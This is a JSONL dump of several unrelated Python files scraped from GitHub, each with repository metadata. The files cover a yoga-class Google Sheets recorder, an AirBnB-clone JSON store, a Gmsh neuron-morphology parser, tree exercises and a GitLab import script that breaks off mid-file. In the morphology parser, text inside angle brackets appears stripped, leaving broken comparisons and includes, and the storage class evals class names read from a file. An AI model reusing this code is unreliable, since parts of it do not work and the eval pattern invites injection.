+{"seq_id":"11088304385","text":"import os\nimport datetime\n\n# Current timestamp for dynamic folder naming\nnow = datetime.datetime.now()\n\n# Base paths for clarity and ease of modification\nBASE_PATH = '/Users/haoyunou/Desktop/ms-security/研究院绩效考核/'\nOUTPUT_BASE_PATH = os.path.join(BASE_PATH, 'exp-data')\n\n# ----------------- # \n# Input Data Paths #\n# ----------------- #\nDATA_FOLDER_PATH = os.path.join(BASE_PATH, '2023Q1&Q2研究院工作量统计/')\nRESEARCHER_INFO_EXCEL_PATH = os.path.join(BASE_PATH, '分析师列表(修正版).xlsx')\nSALESPERSON_INFO_EXCEL_PATH = os.path.join(BASE_PATH, '销售列表.xlsx')\n\n# ----------------- # \n# Output Data Path #\n# ----------------- #\nOUTPUT_FOLDER_PATH = OUTPUT_BASE_PATH\nTXT_FOLDER = os.path.join(OUTPUT_BASE_PATH, 'roadshow_txts')\nTXT_FOLDER_PATH = os.path.join(TXT_FOLDER, now.strftime(\"%Y-%m-%d_%H-%M-%S\"))\n\n# Ensure the output path exists\nif not os.path.exists(TXT_FOLDER_PATH):\n os.makedirs(TXT_FOLDER_PATH)\n\n","repo_name":"OuHaoyun/okr-evaluation","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"70029565843","text":"#!/usr/bin/python3\n\"\"\"\n Module to storing data and load from JSON file\n\"\"\"\nimport json\nimport models\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.amenity import Amenity\nfrom models.review import Review\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\n\n\nclass FileStorage():\n \"\"\"\n Serializes instances to a JSON file and\n deserializes JSON file to instances\n\n Private class attributes:\n __file_path:string - path to the JSON file\n to store de data\n\n __objects:dictionary - empty but will store\n all objects by .id (ex: to store\n a BaseModel object with id=12121212, the key\n will be BaseModel.12121212)\n\n \"\"\"\n\n # |---------------PRIVATE CLASS ATTRIBUTES---------------|\n __file_path = \"data.json\"\n __objects = {}\n\n # |--------------SETTER & GETTER 'name'-----------|\n @property\n def objects(self):\n \"\"\"\n Getter for objects\n \"\"\"\n\n return (self.__objects)\n\n # |---------------PUBLIC INSTANCE METHODS ---------------|\n def all(self):\n \"\"\"\n returns the dictionary of all objects\n \"\"\"\n all_objects = dict()\n for key in self.__objects:\n instance_dict = self.objects.get(key)\n _object = eval(instance_dict.get('__class__'))(**instance_dict)\n all_objects[key] = (_object.__str__())\n\n return (all_objects)\n\n\n def all_two(self):\n \"\"\"\n returns the dictionary of all objects\n \"\"\"\n all_objects = dict()\n for key in self.__objects:\n instance_dict = self.objects.get(key)\n _object = eval(instance_dict.get('__class__'))(**instance_dict)\n all_objects[key] = (_object.__str__())\n\n return (all_objects)\n\n def new(self, obj):\n \"\"\"\n sets in __objects the obj with key .id\n\n Attributes:\n Obj: object to add to the __objects dict\n \"\"\"\n\n key = str(obj.__class__.__name__) + '.' + str(obj.id)\n dictionary = (obj.to_dict())\n self.__objects[key] = dictionary\n\n def save(self):\n \"\"\"\n serializes __objects to the JSON file\n (path: __file_path)\n \"\"\"\n\n dump = json.dumps(self.__objects)\n with open(self.__file_path, 'w') as storage_file:\n storage_file.write(dump)\n\n def reload(self):\n \"\"\"\n deserializes the JSON file to __objects (only if the JSON file\n (__file_path) exists ; otherwise, do nothing.\n If the file doesn’t exist, no exception should be raised)\n \"\"\"\n try:\n with open(self.__file_path, 'r') as read_file:\n self.__objects = json.load(read_file)\n self.all()\n except FileNotFoundError:\n pass\n","repo_name":"lemejiamo/AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7199516734","text":"import json\nimport yaml\n\nwith open(\"help_file.txt\") as handle:\n lines = handle.readlines()\n\nsnippets = {}\n\nlen_lines = len(lines)\n\nfor i, line in enumerate(lines):\n if line.startswith(\"Type\"):\n name = lines[i - 1].strip()\n vtype = line.split()[1].lower()\n ident = \"{}-{}\".format(vtype, name)\n j = i + 1\n description = []\n while j < len_lines and not lines[j].startswith(\"Type\"):\n dline = lines[j].rstrip()\n for subhead in [\"Use\", \"See also\", \"Format\", \"Default\"]:\n if dline.startswith(subhead):\n dline = \"- \" + subhead + \":\" + dline[len(subhead):]\n description.append(dline)\n j += 1\n snippets[ident] = {\n \"prefix\": ident,\n \"body\": name,\n \"description\": \"\\n\".join(description)\n }\n\nwith open(\"help_file_output_types.yaml\") as handle:\n output_data = yaml.load(handle)\n\nfor name, descript in output_data.items():\n ident = \"output-\" + name\n snippets[ident] = {\n \"prefix\": ident,\n \"body\": \"output {} ${{0:filename}}\".format(name),\n \"description\": descript\n }\n\nwith open(\"snippets/gulp-snippets.code-snippets\", \"w\") as handle:\n json.dump(snippets, handle, indent=2)\n","repo_name":"chrisjsewell/gulp-vscode-syntax","sub_path":"convert_help_file.py","file_name":"convert_help_file.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12594906063","text":"\"\"\"\nTests core caching facilities.\n\"\"\"\n\n\nfrom django.test import TestCase\nfrom opaque_keys.edx.locator import AssetLocator, CourseLocator\n\nfrom openedx.core.djangoapps.contentserver.caching import del_cached_content, get_cached_content, set_cached_content\n\n\nclass Content:\n \"\"\"\n Mock cached content\n \"\"\"\n def __init__(self, location, content):\n self.location = location\n self.content = content\n\n def get_id(self):\n return self.location.to_deprecated_son()\n\n\nclass CachingTestCase(TestCase):\n \"\"\"\n Tests for https://edx.lighthouseapp.com/projects/102637/tickets/112-updating-asset-does-not-refresh-the-cached-copy\n \"\"\"\n unicodeLocation = AssetLocator(CourseLocator('c4x', 'mitX', '800'), 'thumbnail', 'monsters.jpg')\n # Note that some of the parts are strings instead of unicode strings\n nonUnicodeLocation = AssetLocator(CourseLocator('c4x', 'mitX', '800'), 'thumbnail', 'monsters.jpg')\n mockAsset = Content(unicodeLocation, 'my content')\n\n def test_put_and_get(self):\n set_cached_content(self.mockAsset)\n self.assertEqual(self.mockAsset.content, get_cached_content(self.unicodeLocation).content,\n 'should be stored in cache with unicodeLocation')\n self.assertEqual(self.mockAsset.content, get_cached_content(self.nonUnicodeLocation).content,\n 'should be stored in cache with nonUnicodeLocation')\n\n def test_delete(self):\n set_cached_content(self.mockAsset)\n del_cached_content(self.nonUnicodeLocation)\n self.assertEqual(None, get_cached_content(self.unicodeLocation),\n 'should not be stored in cache with unicodeLocation')\n self.assertEqual(None, get_cached_content(self.nonUnicodeLocation),\n 'should not be stored in cache with nonUnicodeLocation')\n","repo_name":"openedx/edx-platform","sub_path":"cms/djangoapps/contentstore/tests/test_core_caching.py","file_name":"test_core_caching.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"37430990274","text":"from parse import *\n\nmargin = 10\n\n# Function parseMorphologies\n# Take multiple morphologies and put them together in a cube\n# Inputs:\n# morphologies : list of morphologies .geo files\n# type : type of positioning\n# 0 : simple translation on the X axys\n# 1 : positioning using TODO ADD NAME\n# factor : scaling factor for the point size\ndef parseMorphologies(morphologies, type, factor):\n counter_points = 0\n counter_lines = 0\n geo = ''\n dmg = ''\n minPoint = [100000,100000,100000]\n maxPoint = [-100000,-100000,-100000]\n txt = str(len(morphologies)) + '\\n'\n for i in range(len(morphologies)):\n actual_counter_points = counter_points\n actual_counter_lines = counter_lines\n limitPoint = maxPoint[0] - minPoint[0] #Suppose that every neuron have aproximatelly the same size TODO Correct this\n content = []\n txt_points = ''\n txt_lines = ''\n\n with open(morphologies[i]) as f:\n content = f.read().split('\\n')\n for j in range(len(content)):\n cleanedLine = content[j].replace(\"{\",\"\").replace(\"}\",\"\").replace(\" \",\"\")\n print(str(j)+\": \"+cleanedLine)\n point_parse = parse(\"Point({p})={x},{y},{z},{s};\",cleanedLine)\n line_parse = parse(\"Line({l})={p1},{p2};\",cleanedLine)\n if (point_parse != None):\n # Setting new values TODO Translation and rotation here\n p = int(point_parse['p']) + actual_counter_points\n x = float(point_parse['x']) + i * limitPoint\n y = float(point_parse['y'])\n z = float(point_parse['z'])\n s = float(point_parse['s']) * factor\n\n # Checking Min, Max\n checkX = checkMinMax(x,minPoint[0],maxPoint[0])\n minPoint[0] = checkX[0]\n maxPoint[0] = checkX[1]\n checkX = checkMinMax(y,minPoint[1],maxPoint[1])\n minPoint[1] = checkX[0]\n maxPoint[1] = checkX[1]\n checkX = checkMinMax(z,minPoint[2],maxPoint[2])\n minPoint[2] = checkX[0]\n maxPoint[2] = checkX[1]\n\n # Printing\n geo += 'Point(' + str(p) + ') = {' + str(x) + ',' + str(y) + ',' + str(z) + ',' + str(s) + '};\\n'\n dmg += 'Point[' + str(p) + '] = gmod::new_point3(gmod::Vector{' + str(x) + ',' + str(y) + ',' + str(z) + '},' + str(s) + ');\\n'\n txt_points += '\\n'+ str(p)\n\n counter_points += 1\n\n elif (line_parse != None):\n # Setting new values\n l = int(line_parse['l']) + actual_counter_lines\n p1 = int(line_parse['p1']) + actual_counter_points\n p2 = int(line_parse['p2']) + actual_counter_points\n\n # Printing\n geo += 'Line(' + str(l) + ') = {' + str(p1) + ',' + str(p2) + '} ;\\n'\n dmg += 'gmod::add_to_group(g, gmod::new_line2(Point[' + str(p1) + '], Point[' + str(p2) + ']));\\n'\n txt_lines += ' '+ str(l)\n\n counter_lines += 1\n txt += str(counter_points - actual_counter_points) + txt_points + '\\n'\n txt += str(counter_lines - actual_counter_lines) + txt_lines + '\\n'\n # Main part pour Gmodel to generate .dmg\n dmg = \"#include \\n\"+\"#include \\n\"+\"\\n\"+\"int main()\\n\"+\" std::vector Point;\\n\"+\" auto g = gmod::new_group();\\n\"+\" Point.resize(\" + str(counter_points) + \");\\n\"+\"\\n\"+ dmg\n\n # Cube calculation\n cubeSize = max(maxPoint[0]-minPoint[0],maxPoint[1]-minPoint[1],maxPoint[2]-minPoint[2])/2 + margin\n middle = [(maxPoint[0]+minPoint[0])/2,(maxPoint[1]+minPoint[1])/2,(maxPoint[2]+minPoint[2])/2]\n\n # Cube generation .geo\n geo += newPoint(middle[0]-cubeSize, middle[1]-cubeSize, middle[2]-cubeSize,cubeSize/2,1)\n geo += newPoint(middle[0]+cubeSize, middle[1]-cubeSize, middle[2]-cubeSize,cubeSize/2,2)\n geo += newPoint(middle[0]+cubeSize, middle[1]+cubeSize, middle[2]-cubeSize,cubeSize/2,3)\n geo += newPoint(middle[0]-cubeSize, middle[1]+cubeSize, middle[2]-cubeSize,cubeSize/2,4)\n geo += newPoint(middle[0]-cubeSize, middle[1]-cubeSize, middle[2]+cubeSize,cubeSize/2,5)\n geo += newPoint(middle[0]+cubeSize, middle[1]-cubeSize, middle[2]+cubeSize,cubeSize/2,6)\n geo += newPoint(middle[0]+cubeSize, middle[1]+cubeSize, middle[2]+cubeSize,cubeSize/2,7)\n geo += newPoint(middle[0]-cubeSize, middle[1]+cubeSize, middle[2]+cubeSize,cubeSize/2,8)\n\n geo += newLine('p1','p2',1)\n geo += newLine('p2','p3',2)\n geo += newLine('p3','p4',3)\n geo += newLine('p4','p1',4)\n geo += newLine('p5','p6',5)\n geo += newLine('p6','p7',6)\n geo += newLine('p7','p8',7)\n geo += newLine('p8','p5',8)\n geo += newLine('p1','p5',9)\n geo += newLine('p2','p6',10)\n geo += newLine('p3','p7',11)\n geo += newLine('p4','p8',12)\n\n geo += \"Line Loop(1) = {l1,l2,l3,l4};\\nLine Loop(2) = {l5,l6,l7,l8};\\nLine Loop(3) = {l1,l10,-l5,-l9};\\nLine Loop(4) = {l2,l11,-l6,-l10};\\nLine Loop(5) = {l3,l12,-l7,-l11};\\nLine Loop(6) = {l4,l9,-l8,-l12};\\n\"\n\n geo += \"Plane Surface(11) = {1};\\nPlane Surface(12) = {2};\\nPlane Surface(13) = {3};\\nPlane Surface(14) = {4};\\nPlane Surface(15) = {5};\\nPlane Surface(16) = {6};\\n\"\n\n geo += \"Surface Loop(1) = {11,13,14,15,16,12};\\nVolume(11) = {1};\\n\"\n\n geo += \"For t In {0:\" + str(counter_lines-1) + \"}\\n Line{t} In Volume{11};\\nEndFor\"\n\n # Cube generation .dmg\n dmg += \"auto c = gmod::new_cube(gmod::Vector{\" + str(minPoint[0]) + \", \" + str(minPoint[1]) + \", \" + str(minPoint[2]) + \"},gmod::Vector{\" + str(cubeSize) + \", 0, 0},gmod::Vector{0, \" + str(cubeSize) + \", 0},gmod::Vector{0, 0, \" + str(cubeSize) + \"});\\n\"\n dmg += \"gmod::add_to_group(g, c);\\n\"\n dmg += 'write_closure_to_geo(g, \"neuron.geo\");\\nwrite_closure_to_dmg(g, \"neuron.dmg\");\\n}'\n\n\n\n return [geo,dmg,txt]\n\ndef checkMinMax(a,mini,maxi):\n retMin = mini\n retMax = maxi\n if (amaxi):\n retMax = a\n return [retMin,retMax]\n\ndef newPoint(x,y,z,g,i):\n return \"p\" + str(i) + \" = newp;\\nPoint(p\" + str(i) + \") = {\" + str(x) + \", \" + str(y) + \", \" + str(z) + \", \" + str(g) + \"};\\n\"\n\ndef newLine(p1,p2,i):\n return \"l\" + str(i) + \" = newl;\\nLine(l\" + str(i) + \") = {\" + str(p1) + \",\" + str(p2) + \"};\\n\"\n","repo_name":"sv91/Morpho-Organizer","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15034959493","text":"\"\"\"\nBelow code required to link into google sheets spreadsheet,\ndatetime and colorama to add stylling the terminal.\n\nI used the following YouTube video to find out how\nto use Colorama:\nhttps://www.youtube.com/watch?v=u51Zjlnui4Y\n\"\"\"\nimport datetime\nfrom datetime import date\nimport gspread\nfrom google.oauth2.service_account import Credentials\nimport colorama\nfrom colorama import Fore\ncolorama.init()\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('yoga _flow_class_record')\n\ncapacity = SHEET.worksheet(\"capacity\")\nprices = SHEET.worksheet(\"prices\")\nworksheet_update = SHEET.worksheet(\"attendance\")\n\n\"\"\"\nnew_lesson_data adds user input into a list which is pushed back\ninto the spreadsheet when all data is collected.\n\"\"\"\nnew_lesson_data = []\n\nprint(Fore.LIGHTMAGENTA_EX)\nprint(\"Hello, welcome to Yoga Flow Class Record.\\n\")\nprint(\"\\033[39m\")\n\n\ndef lesson_day_data():\n \"\"\"\n Input and validate 'day' data from the user and\n returns an error if incorrect data submitted.\n\n I used the Stack Overflow to help with the below while loop.\n Page linked in the Readme file.\n \"\"\"\n\n print(\"Please provide the day of your lesson in full.\")\n print(\"Example: monday not mon\")\n\n lesson_day = (\n \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\",\n \"Saturday\", \"Sunday\")\n\n while True:\n print(Fore.CYAN)\n day_data_str = input(\"Enter lesson day here:\\n\")\n print(\"\\033[39m\")\n input_day = day_data_str.title()\n day = str(input_day)\n\n day_data = False\n\n if day in lesson_day:\n day_data = True\n print(\"\\n\")\n\n if day_data:\n # append user input to a list of user inputs\n new_lesson_data.append(input_day)\n break\n else:\n print(Fore.RED)\n print(f\"{Fore.RED}Invalid data: {day}\")\n print(\"\\033[39m\")\n print(\"Please input a day in the week\")\n\n\ndef lesson_date_data():\n \"\"\"\n Input and validate 'date' data from the user and\n return an error if incorrect data submitted.\n\n I used Stack Overflow to help with this function. The\n link used has been added to the README file.\n \"\"\"\n while True:\n print(\"Please input the date of your lesson.\")\n print(Fore.CYAN)\n input_date = input(\"Enter the date in format 'dd/mm/yy':\\n\")\n print(\"\\033[39m\")\n\n try:\n day, month, year = input_date.split('/')\n my_date = date(int(year), int(month), int(day))\n if my_date:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(input_date)\n break\n except ValueError as e:\n print(Fore.RED)\n print(f\"Invalid data: {e}\")\n print(\"\\033[39m\")\n print(\"Please try again \\n\")\n\n\ndef lesson_time_data():\n \"\"\"\n Input and validate 'time' data from the user and\n return an error if incorrect data submitted\n \"\"\"\n\n while True:\n print(\"Please provide time (00:00) of your lesson.\")\n print(Fore.CYAN)\n time_data_str = input(\"Enter time here:\\n\")\n print(\"\\033[39m\")\n\n timeformat = (\"%H:%M\")\n\n try:\n validtime = datetime.datetime.strptime(\n time_data_str, timeformat)\n if validtime:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(time_data_str)\n break\n except ValueError as e:\n print(f\"{Fore.RED}Invalid data: {e} \\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_duration_data():\n \"\"\"\n Input and validate 'duration' data from the user and\n return error if incorrect data submitted\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n\n while True:\n print(\"Please provide the duration of your lesson in minutes.\")\n print(\"Example: 60\")\n try:\n print(Fore.CYAN)\n duration_data_str = int(input(\"Enter lesson duration here:\\n\"))\n print(\"\\033[39m\")\n\n # Used this page to find out how to remove an item from a list:\n # https://www.edureka.co/blog/python-list-remove/#pop()\n lesson_durations = prices.col_values(1)\n del lesson_durations[0]\n # Used method 3 to turn a list of strings into a list of integers\n # https://www.geeksforgeeks.org/python-converting-all-strings-in-list-to-integers/\n duration_int = list(map(int, lesson_durations))\n\n # I used Stack Overflow to help with comparing a user answer with\n # a list:\n # https://stackoverflow.com/questions/3944655/testing-user-input-against-a-list-in-python\n if duration_data_str in duration_int:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(duration_data_str)\n\n # duration_index Stores globally the index of the duration\n # input by the user from the list pulled from the worksheet.\n # This will be used when calculating earnings for that lesson.\n global duration_index\n duration_index = 0\n duration_data_index = duration_int.index(duration_data_str)\n duration_index = duration_data_index\n break\n else:\n print(Fore.RED)\n print(f\"{duration_data_str} is not a valid duration\\n\")\n print(\"\\033[39m\")\n except ValueError as e:\n print(f\"{Fore.RED}invalid data: {e}please try again \\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_location_data():\n \"\"\"\n Input and validate 'location' data from the user and\n return error if incorrect data submitted\n\n Used the below link to find out how to link to a\n column of data in a spreadsheet:\n https://docs.gspread.org/en/latest/user-guide.html#getting-a-cell-value\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n\n while True:\n print(\"Please provide the location of your lesson.\")\n print(\"For example: Camden Town\")\n print(Fore.CYAN)\n location_data_str = input(\"Enter your data here:\\n\")\n print(\"\\033[39m\")\n location_data = location_data_str.title()\n\n try:\n location_col = capacity.col_values(1)\n del location_col[0]\n if location_data in location_col:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(location_data)\n\n # location_index Stores globally the index of the location\n # input by the user from the list pulled from the worksheet.\n # This will be used when inputting student attendance to\n # identify the capacity of the studio and run an error if\n # attendance input is too high.\n\n global location_index\n location_index = 0\n location_data_index = location_col.index(location_data)\n location_index = location_data_index\n break\n else:\n raise ValueError()\n except ValueError:\n print(Fore.RED)\n print(f\"Invalid data: {location_data_str}, please try again\\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_attendance_data():\n \"\"\"\n Input and validate 'attendance' data from the user and\n return error if incorrect data submitted\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n while True:\n # column of capacity data for each location\n location_capacity = capacity.col_values(2)\n # deletes the first item in column of data\n del location_capacity[0]\n\n try:\n print(\"Please provide the number of students who attended.\")\n print(Fore.CYAN)\n lesson_attendance_str = input(\n \"Enter student attendance here:\\n\")\n print(\"\\033[39m\")\n lesson_attendance = int(lesson_attendance_str)\n\n # Get the capacity using the index stored in location_index\n # I used\n # https://www.programiz.com/python-programming/methods/list/index\n # to help with using the index to check a user input\n capacity_index = int(location_capacity[location_index])\n\n global attendance_total\n attendance_total = 0\n attendance_input = lesson_attendance\n attendance_total = attendance_input\n\n if lesson_attendance <= capacity_index:\n # append user input to a list of user inputs\n new_lesson_data.append(lesson_attendance)\n break\n else:\n while True:\n print(Fore.YELLOW)\n print(f\"{lesson_attendance} is above capacity\\n\")\n print(\"Do you wish to continue?\")\n higher_capacity = input(\"y/n \\n\")\n add_higher_cap = higher_capacity.upper()\n print(\"\\033[39m\")\n if add_higher_cap == \"Y\":\n new_lesson_data.append(lesson_attendance)\n return False\n elif add_higher_cap == \"N\":\n return lesson_attendance_data()\n else:\n raise ValueError()\n except ValueError as e:\n print(Fore.RED)\n print(f\"Data invalid: {e}, please try again\\n\")\n print(\"\\033[39m\")\n\n\ndef calculate_earnings():\n \"\"\"\n Calculate the earnings for the lesson using the attendance\n and duration input by the user and the price list\n on the linked spreadsheet\n \"\"\"\n\n lesson_price = prices.col_values(2)\n del lesson_price[0]\n\n price = int(lesson_price[duration_index])\n\n lesson_earnings = price * attendance_total\n\n # I've placed the below print statement here as input\n # data should not push back into the worksheet if it\n # isn't valid\n print(f\"\\n{Fore.LIGHTGREEN_EX}Data input is valid!\\n\")\n print(\"\\033[39m\")\n\n print(\n f\"Total earnings for this class is: {Fore.GREEN}£{lesson_earnings} \\n\")\n print(\"\\033[39m\")\n # append calculation to a list of user inputs\n new_lesson_data.append(lesson_earnings)\n\n\ndef update_attendance_worksheet(data):\n \"\"\"\n Push user inputs and calculations stored in the\n new_lesson_data list back into the attendance worksheet\n \"\"\"\n\n print(Fore.BLUE)\n print(\"Updating worksheet... \\n\")\n # appends user inputs and calulations into the attendance worksheet\n worksheet_update.append_row(data)\n\n print(\"Attendance worksheet updated! \\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_data():\n \"\"\" Runs all the functions\n \"\"\"\n lesson_day_data()\n lesson_date_data()\n lesson_time_data()\n lesson_duration_data()\n lesson_location_data()\n lesson_attendance_data()\n data = new_lesson_data\n calculate_earnings()\n update_attendance_worksheet(data)\n return add_more_data()\n\n\ndef add_more_data():\n \"\"\" Loops back to the beginning if\n the user has more data to add.\n\n Used the following website to help write\n the code below:\n https://maschituts.com/2-ways-to-loop-back-to-the-beginning-of-a-program-in-python/\n \"\"\"\n try:\n print(Fore.YELLOW)\n add_data = input(\"Do you want to add more data [y/n]?\\n\")\n print(\"\\033[39m\")\n new_data = add_data.upper()\n while True:\n if new_data == \"Y\":\n new_lesson_data.clear()\n print(\"\\n\")\n return lesson_data()\n elif new_data == \"N\":\n print(\"\\n\")\n break\n else:\n raise ValueError()\n except ValueError as e:\n print(Fore.RED)\n print(f\"Invalid input {e}, please input y/n \\n\")\n print(\"\\033[39m\")\n return add_more_data()\n\n\ndef calculate_total_earnings():\n \"\"\"\n Return to the user their total earnings so far.\n \"\"\"\n all_earnings = worksheet_update.col_values(7)\n del all_earnings[0]\n # Used method 3 to turn a list of strings into a list of integers\n # https://www.geeksforgeeks.org/python-converting-all-strings-in-list-to-integers/\n all_earnings_int = list(map(int, all_earnings))\n\n earnings_total = sum(all_earnings_int)\n print(f\"Total earnings to date: {Fore.GREEN}£{earnings_total}\")\n print(\"\\033[39m\")\n print(Fore.LIGHTMAGENTA_EX)\n print(\"Thank you, goodbye for now...\")\n print(\"\\033[39m\")\n\n\nlesson_data()\ncalculate_total_earnings()\n","repo_name":"SamanthaBooth81/yoga-flow-class-record","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"24823812835","text":"#!/usr/bin/env python3\n\nimport sys\nfrom unitypack.asset import Asset\n\ndef main(f):\n\tasset = Asset.from_file(f)\n\n\tfor id, obj in asset.objects.items():\n\t\tname = ''\n\t\tif hasattr(obj.read(), 'name'):\n\t\t\tname = obj.read().name\n\t\tprint('{}\\t{}\\t{}\\t{}'.format(id, obj.type_id, obj.type, name))\n\nif __name__ == '__main__':\n\twith open(sys.argv[1], 'rb') as f:\n\t\tmain(f)\n","repo_name":"dongresource/UnityPackFF","sub_path":"bin/list_contents.py","file_name":"list_contents.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"34752532972","text":"# Write a function, tree_min_value, that takes in the root of a binary tree that contains number values. The function should return the minimum value within the tree.\n\n# You may assume that the input tree is non-empty.\n\n# input: root of tree\n# output: min value\n# create a queue\n# create result to hold min and have it = float(inf)\n# while queue to iterate until empty\n# create current to hold popleft node\n# if current.val < result result = current.val\n# return result\n\nfrom collections import deque\nimport math\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n# iterative solution\n# time O(n) since we iterate through n nodes\n# space O(n) since we create queue\ndef tree_min_value(root):\n result = math.inf\n queue = deque([root])\n\n while queue:\n current = queue.popleft()\n\n if current.val < result:\n result = current.val\n\n if current.right:\n queue.append(current.right)\n if current.left:\n queue.append(current.left)\n\n return result\n\n# recursive solution\n\ndef tree_min_value_recur(root, result = math.inf):\n if root is None:\n return math.inf\n\n left = tree_min_value_recur(root.left, result)\n right = tree_min_value_recur(root.right, result)\n\n return min(root.val, left, right)\n\n\na = Node(3)\nb = Node(11)\nc = Node(4)\nd = Node(4)\ne = Node(-2)\nf = Node(1)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n# 3\n# / \\\n# 11 4\n# / \\ \\\n# 4 -2 1\nprint(tree_min_value(a)) # -> -2\nprint(tree_min_value_recur(a)) # -> -2\n","repo_name":"Jblancs/DSA","sub_path":"structy/binary-tree/5-tree-min-value.py","file_name":"5-tree-min-value.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37759390764","text":"\"\"\"\nUses the Gitlab API to learn more about the Gitlab projects.\n\"\"\"\n\nimport os\nimport json\nfrom utils import constants as c, utils, osg, osg_gitlab, osg_parse\n\ngl_entries_file = os.path.join(c.code_path, 'gitlab_entries.txt')\nprefix = 'https://gitlab.com/'\n\n# these may give errors and should be ignored\nignored_repos = ()\n\ndef collect_gitlab_entries():\n \"\"\"\n Reads the entries of the database and collects all entries with a Gitlab repository. Just for convenience to limit\n the number of entries to iterate on later.\n \"\"\"\n\n # read entries\n entries = osg.read_entries()\n print('{} entries read'.format(len(entries)))\n\n # loop over entries\n files = []\n for entry in entries:\n urls = [x for x in entry.get('Code repository', []) if x.startswith(prefix)]\n if urls:\n files.append(entry['File'])\n\n # write to file\n print('{} entries with gitlab repos'.format(len(files)))\n utils.write_text(gl_entries_file, json.dumps(files, indent=1))\n\n\ndef gitlab_import():\n \"\"\"\n Import various information from Gitlab repositories (like contributors) or stars for Gitlab repos\n \"\"\"\n private_properties = json.loads(utils.read_text(c.private_properties_file))\n\n files = json.loads(utils.read_text(gl_entries_file))\n\n all_developers = osg.read_developers()\n print(' {} developers read'.format(len(all_developers)))\n\n # all exceptions that happen will be eaten (but will end the execution)\n try:\n # loop over each entry\n for index, file in enumerate(files):\n print(' process {} ({})'.format(file, index))\n\n # read entry\n entry = osg.read_entry(file)\n code_repositories = entry['Code repository']\n repos = [x for x in code_repositories if x.startswith(prefix)]\n repos[0] += ' @add'\n repos = [x for x in repos if '@add' in x]\n repos = [x.split(' ')[0] for x in repos]\n repos = [x for x in repos if x not in ignored_repos]\n for repo in repos:\n print(' GH repo {}'.format(repo))\n\n info = osg_gitlab.retrieve_repo_info(repo)\n\n new_comments = []\n\n # add created comment\n new_comments.append('@created {}'.format(info['created'].year))\n\n # add stars\n new_comments.append('@stars {}'.format(info['stars']))\n\n # add forks\n new_comments.append('@forks {}'.format(info['forks']))\n\n # search for repository\n for r in code_repositories:\n if r.startswith(repo):\n break\n\n # update comment\n comments = r.comment\n if comments:\n comments = comments.split(',')\n comments = [c.strip() for c in comments]\n comments = [c for c in comments if not c.startswith('@')] # delete old ones\n comments += new_comments\n else:\n comments = new_comments\n r.comment = ', '.join(comments)\n\n # language in languages\n for language, usage in info['languages'].items():\n if language in c.known_languages and usage > 5 and language not in entry['Code language']:\n entry['Code language'].append(language)\n print(' added to languages: {}'.format(language))\n\n entry['Code repository'] = code_repositories\n osg.write_entry(entry)\n except:\n raise\n finally:\n # shorten file list\n utils.write_text(gl_entries_file, json.dumps(files[index:], indent=1))\n\n # osg.write_developers(all_developers)\n print('developers database updated')\n\n\ndef gitlab_starring_synchronization():\n \"\"\"\n Which Gitlab repositories haven't I starred yet.\n \"\"\"\n private_properties = json.loads(utils.read_text(c.private_properties_file))\n\n files = json.loads(utils.read_text(gl_entries_file))\n\n # loop over each entry and collect list of repos\n all_repos = []\n for index, file in enumerate(files):\n # read entry\n entry = osg.read_entry(file)\n\n # get repos\n code_repositories = entry.get('Code repository', [])\n repos = [x for x in code_repositories if x.startswith(prefix)]\n repos[0] += ' @add'\n repos = [x for x in repos if '@add' in x]\n repos = [x.split(' ')[0] for x in repos]\n repos = [x for x in repos if x not in ignored_repos]\n all_repos.extend(repos)\n all_repos = set(all_repos)\n print('found {} Gitlab repos'.format(len(all_repos)))\n\n\n\nif __name__ == \"__main__\":\n # collect entries (run this only once)\n # collect_gitlab_entries()\n\n # import information from gh\n # gitlab_import()\n\n # 